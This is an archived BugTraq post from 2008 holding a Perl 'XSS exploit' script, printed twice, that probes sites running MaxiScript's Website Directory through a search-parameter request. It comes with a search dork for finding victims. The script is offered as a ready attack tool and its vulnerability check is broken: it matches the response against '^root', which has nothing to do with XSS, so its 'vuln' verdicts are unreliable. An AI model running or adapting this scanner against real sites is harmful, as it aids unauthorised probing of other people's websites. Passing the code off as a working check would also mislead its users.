BugTraq
Back to list
|
Post reply
Website Directory - XSS Exploit
Oct 03 2008 01:01PM
Ghost hacker (ghost-r00t hotmail com)
#!/usr/bin/perl
##################################
# Coded And Found by Ghost Hacker #
# Home www.Real-h.com #
# Email Ghost-r00t[at]hotmail[dot]com #
##################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print "\t\t########################################################\n\n";
print "\t\t# Website Directory - XSS Exploit #\n\n";
print "\t\t# by Ghost Hacker [Real-h.com] #\n\n";
print "\t\t# Dork : Powered by MaxiScript.com #\n\n";
print "\t\t########################################################\n\n";
if (!$ARGV[0])
{
print " Author : Ghost Hacker\n";
print " Home : www.Real-h.com\n";
print " Email : Ghost-r00t[at]Hotmail[dot]com\n";
print " Download : http://www.maxiscript.com/websitedirectory.php\n";
print " Usage : perl Ghost.pl [Host]\n";
print " Example : perl Ghost.pl http://Real-h.com/path/\n";
}
else
{
$web=$ARGV[0];
chomp $web;
$iny="index.php?keyword=Xss_Hacking&action=search";
my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}
}
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#!/usr/bin/perl
##################################
# Coded And Found by Ghost Hacker #
# Home www.Real-h.com #
# Email Ghost-r00t[at]hotmail[dot]com #
##################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print "\t\t########################################################\n\n";
print "\t\t# Website Directory - XSS Exploit #\n\n";
print "\t\t# by Ghost Hacker [Real-h.com] #\n\n";
print "\t\t# Dork : Powered by MaxiScript.com #\n\n";
print "\t\t########################################################\n\n";
if (!$ARGV[0])
{
print " Author : Ghost Hacker\n";
print " Home : www.Real-h.com\n";
print " Email : Ghost-r00t[at]Hotmail[dot]com\n";
print " Download : http://www.maxiscript.com/websitedirectory.php\n";
print " Usage : perl Ghost.pl [Host]\n";
print " Example : perl Ghost.pl http://Real-h.com/path/\n";
}
else
{
$web=$ARGV[0];
chomp $web;
$iny="index.php?keyword=Xss_Hacking&action=search";
my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}
}
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]